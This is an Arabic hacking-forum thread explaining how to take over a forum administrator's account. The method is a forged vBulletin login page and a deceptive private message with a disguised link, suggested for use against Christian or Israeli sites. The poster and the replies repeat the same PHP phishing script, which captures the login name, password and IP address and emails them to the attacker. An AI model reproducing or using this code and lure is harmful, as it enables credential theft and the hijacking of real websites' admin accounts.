منتديات سكون القمر - اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة

السلام عليكم ورحمة الله وبركاته

الموضوع اهداء الى المشككين اني هكر ولا هاذه الموضوع هو الاثبات

انا ما اضر انفع المسلمينبين خطين

السلام عليكم ورحمة الله وبركاته

كيفكم شباب ؟

ان شاء الله طيبين

طبعا في كثير من المواقع لمن تجي تستهدفها ماتحصل ثغرات
تخمن على الوردبريس + جوميلا وماتطلع بنتيجة

انا بأعطيكم الفكرة والباقي عليكم

المتطلبات

1/ منتدى على سيرفر الهدف

====================

اول شئ تدخل على المنتدى وتزور صفحة الدخول
كيف تزورها تابع الشرح اللي في الفديو

https://www.youtube.com/watch?v=bYAmz5n-ofk
طيب زورت الصفحة وكل شئ ايش بتسوي

تروح لمدير المنتدى وترسلو رسالة خاصه وبحركة فنية بسيطه تلغم رابط موضوع

كيف تلغمو تاخذ رابط اي موضوع

كسبيل مثال هذا

تصميم فلاشي ^_^ - مجتمع الفرسان

تقوم تعدل على الرابط
بزيادة رقمين
http://www.x6x.net/vb/showthread.php?t=1790505
علشان لمن ينسخ الرابط يعطيه خطا

وتقوم تسوي ارتباط تشعبي
عن طريق الايقونه هذه
http://www.x6x.net/vb/images/editor/createlink.gif

تضغط وبتحط رابط الصفحة المزوره

طبعا الرساله الخاصه لمن ترسلها للمدير على حسب الموقع
مثلا
تقول
في موضوع في المنتدى يدعو الى الاسلام نرجو حذف الموضوع << طبعا لمن يكون الموقع مسيحي او اسرائيلي

ترجم قوقل يامعلم وارسل

طبعا راح ارفقلكم في الموضوع

كود التغليم اللي في الفديو

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>

تابع وبتركيز

تنسيق الكود

ياليت شرح بسيط للكود

كود PHP:

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>

http://www.x6x.net/vb/frsan_hexll/bu...reputation.gif http://www.x6x.net/vb/frsan_hexll/buttons/report.gif
http://www.x6x.net/vb/images/likeicon.png

http://www.x6x.net/vb/frsan_hexll/buttons/quote.gif http://www.x6x.net/vb/frsan_hexll/bu...iquote_off.gif http://www.x6x.net/vb/frsan_hexll/bu...quickreply.gif
فترة الأقامة : 23 يوم معدل التقييم : http://www.x6x.net/vb/images/reputat...tation_pos.gif http://www.x6x.net/vb/images/reputat...tation_pos.gif http://www.x6x.net/vb/images/reputat...tation_pos.gif http://www.x6x.net/vb/images/reputat...tation_pos.gif http://www.x6x.net/vb/images/reputat...tation_pos.gif زيارات الملف الشخصي : 9
إحصائية مشاركات » xjava المواضيـعالــــــردود [+] [+] بمـــعــدل : 0.30 يوميا
xjavaمشاهدة ملفه الشخصي إرسال رسالة خاصة إلى xjava البحث عن كل مشاركات xjava إضافة xjava إلى الإتصالات الخاصة بك
http://www.x6x.net/vb/frsan_hexll/st...n/post_old.gif 04-30-2015, 01:01 PM #3
الهيكل العظمي
.: HaCkErs x6x :.

http://www.x6x.net/vb/images/smilies/017[1].gif::.KAREEM HACK ::. http://www.x6x.net/vb/images/smilies/eh_s(22)[1].gif
http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/najwm-1/95.gif http://www.x6x.net/vb/images/rating/star.gif http://www.x6x.net/vb/images/rating/star.gif http://www.x6x.net/vb/images/rating/star.gif http://www.x6x.net/vb/images/rating/star.gif http://www.x6x.net/vb/images/rating/star.gif http://www.x6x.net/vb/images/rating/star.gif http://www.x6x.net/vb/images/rating/star.gif http://www.x6x.net/vb/images/rating/star.gif

http://www.x6x.net/vb/image.php?u=17...ine=1408275638
http://www.x6x.net/vb/frsan_hexll/st...ser_online.gif

بيانات اضافيه [ + ] رقم العضوية : 176477 تاريخ التسجيل : 13-08-2014 أخر زيارة : اليوم (12:23 PM) المشاركات : 846 [ + ] التقييم : 18632 الدولهـ
http://www.x6x.net/vb/helm/flags/Saudi Arabia.gif

3270

http://www.x6x.net/vb/images/icons/icon1.gif رد: اختراق اي منتدى عن طريق الهندسة الاجتماعية وتزور الصفحة هع

اقتباس:
المشاركة الأصلية كتبت بواسطة xjava http://www.x6x.net/vb/frsan_hexll/buttons/viewpost.gif
تنسيق الكود

ياليت شرح بسيط للكود

كود PHP:

<?php
$login_email = $_POST['vb_login_username'];
$login_password = $_POST['vb_login_password'];
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
session_start();
session_register("login_email");
session_register("login_password");
setcookie("emaill", $login_email, time()+3600); /* expire in 1 hour */
setcookie("passwordd", $login_password, time()+3600); /* expire in 1 hour */
if((empty($login_email))OR(empty($login_password)) ) { header("Location: index.htm"); } else {
$email="$login_email";
$email=strpos($login_email, "@");
if($email==false){ header("Location: index.htm"); }

header("Location: رابط الموقع اللي لغمته/");
}
$send = "اميلك";
$msg = "$login_email,$login_password,$ip";
$subject = "رابط المنتدى اللي لغمته /";
mail("اميلك", $subject, $msg);
?>